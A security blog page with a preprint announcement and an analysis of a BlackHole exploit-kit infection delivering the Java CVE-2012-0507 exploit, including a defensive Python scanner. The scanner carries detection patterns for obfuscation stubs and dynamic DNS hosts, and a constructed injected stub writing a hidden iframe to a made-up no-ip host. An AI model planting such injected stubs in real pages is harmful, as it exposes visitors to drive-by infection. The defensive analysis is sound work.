Monday, July 2, 2012

IEEE Security and Privacy (PrePrint) - Targeted Cyber Attacks - A Superset of APTs

Our paper on "Targeted Cyber Attacks - A Superset of Advanced Persistent Threats" is available in preprint at:

http://www.computer.org/csdl/mags/sp/preprint/msp2012990114-abs.html 

Abstract - Cybercrime increasingly impacts the online world, and targeted attacks are playing a significant role in disrupting the online social and economic model. In addition, nations are facing threats as a result of targeted attacks. In this paper we examine a variety of components and techniques that are brought together to bring about targeted attacks.

I will update the details once it is published in hard copy.

Sunday, July 1, 2012

BlackHole + Java Array Exploit - Rising High

During our analysis, we have seen several websites infected with obfuscated JavaScript that points to one Browser Exploit Pack (BEP) or another. BlackHole is typically the primary weapon for automated infections through drive-by-download attacks. Recently, another high-traffic website was found to be running a malicious script that loads BlackHole to trigger the infection.

The Java array exploit is on the rise nowadays. Microsoft has discussed the details of this vulnerability at: http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx.

The obfuscated script is available here - http://pastebin.com/nVQcmMsM. It deobfuscates to the following code:


The URLs are designed to use no-ip or a similar dynamic DNS service. According to Wikipedia, "Dynamic DNS or DDNS is a method of updating, in real time, a Domain Name System (DNS) to point to a changing IP address on the Internet. This is used to provide a persistent domain name for a resource that may change location on the network."

We mapped the IP address in question and, while doing some behavioral analysis, found a plugin detection script at the following links:

Obfuscated code - http://pastebin.com/rK0NaAMh.
Deobfuscated plugin detection code - http://pastebin.com/QxiXVRcG

The code fingerprints the browser for the set of plugins it is running. On finding a vulnerable version of the Java plugin, the script downloads the malicious JAR file that runs the specific Java exploit.
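The injected scripts described above (the deobfuscation stub that writes a hidden iframe, the dynamic DNS hostnames, and the plugin fingerprinting that precedes the JAR download) leave static traces an analyst can score without executing the page. The following Python triage script is an added example and not code from the original post: it extracts inline `<script>` bodies from saved HTML, statically undoes one layer of `%NN` / `\xNN` escaping, and flags the typical stub constructs and dynamic DNS suffixes. The indicator weights, the threshold, the suffix list and the sample page are all assumptions made for illustration; the hostnames in the sample are constructed.

```python
"""Static triage of inline JavaScript for drive-by-download indicators.

Added example (not code from the original post). Scores each inline <script>
for the obfuscation and fingerprinting constructs described in the post,
decodes one layer of %NN / \\xNN escapes, and flags dynamic DNS hosts.
Weights, threshold, suffix list and the sample page are assumptions.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# The post names no-ip; the rest of this list is assumed and illustrative,
# not an authoritative blocklist.
DYNAMIC_DNS_SUFFIXES = ("no-ip.org", "no-ip.biz", "no-ip.info", "dyndns.org")

# Constructs typical of deobfuscation stubs and plugin fingerprinting, with
# assumed weights. Checked against both raw and decoded script text.
INDICATORS = {
    "eval(": 2,
    "unescape(": 2,
    "String.fromCharCode": 2,
    "document.write(": 1,
    "navigator.plugins": 1,
    "PluginDetect": 2,
    "<iframe": 2,
    ".jar": 2,
}

ESCAPE_RE = re.compile(r"\\x[0-9a-fA-F]{2}|%[0-9a-fA-F]{2}")


class InlineScriptExtractor(HTMLParser):
    """Collects inline <script> bodies and external script src URLs."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.srcs = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        self._in_script = True
        self._buf = []
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.scripts.append("".join(self._buf))

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


def escape_ratio(code):
    """Fraction of the text made up of %NN or \\xNN escape sequences."""
    if not code:
        return 0.0
    escaped = sum(len(m) for m in ESCAPE_RE.findall(code))
    return escaped / len(code)


def decode_one_layer(code):
    """Statically undo one layer of %NN (unescape) and \\xNN escapes."""
    text = re.sub(r"\\x([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1), 16)), code)
    return unquote(text)


def score_script(code):
    """Return (score, findings) for one inline script body."""
    score, findings = 0, []
    decoded = decode_one_layer(code)
    for needle, weight in INDICATORS.items():
        if needle in code or needle in decoded:
            findings.append(needle)
            score += weight
    ratio = escape_ratio(code)
    if ratio > 0.3:  # assumed threshold: mostly-escaped text is a payload
        findings.append("escaped payload (%d%% of script)" % round(ratio * 100))
        score += 3
    for suffix in DYNAMIC_DNS_SUFFIXES:
        if suffix in code or suffix in decoded:
            findings.append("dynamic DNS host: " + suffix)
            score += 2
    return score, findings


def scan_html(html, threshold=5):
    """Return the inline scripts and external srcs worth an analyst's look."""
    parser = InlineScriptExtractor()
    parser.feed(html)
    parser.close()
    hits = []
    for idx, code in enumerate(parser.scripts):
        score, findings = score_script(code)
        if score >= threshold:
            hits.append({"kind": "inline", "index": idx,
                         "score": score, "findings": findings})
    for src in parser.srcs:
        for suffix in DYNAMIC_DNS_SUFFIXES:
            if suffix in src:
                hits.append({"kind": "external", "src": src, "score": 2,
                             "findings": ["dynamic DNS host: " + suffix]})
    return hits


# Constructed sample page: one benign script, one injected stub that writes a
# percent-encoded hidden iframe pointing at a dynamic DNS host, and one
# external script. Hostnames are made up for the example.
_PAYLOAD = '<iframe src="http://example.no-ip.org/in.php" width=1 height=1>'
SAMPLE_HTML = """<html><body>
<script>
function trackPage() { console.log("analytics"); }
</script>
<script>
var p = "%s";
document.write(unescape(p));
</script>
<script src="http://cdn.example.com/lib.js"></script>
</body></html>""" % "".join("%%%02X" % ord(c) for c in _PAYLOAD)

if __name__ == "__main__":
    for hit in scan_html(SAMPLE_HTML):
        print(hit)
```

Run it against saved copies of the affected pages; the benign analytics script in the sample scores zero while the injected stub is reported with the decoded iframe, the `unescape(` / `document.write(` pair, the escaped-payload ratio and the no-ip hostname. A single static decode layer is deliberate: it catches the common one-pass stubs without executing attacker JavaScript, and anything still opaque after that is better handed to a sandboxed browser than decoded blindly.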


The decompiled code is available here: http://pastebin.com/5FWMUEtP

Java exploits have become popular. We have also discussed the top 5 Java exploits earlier here: http://secniche.blogspot.com/2011/05/finest-5-java-exploit-on-fire.html.

The Java array indexing vulnerability is the new kid in town. See the vulnerability entry - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0507.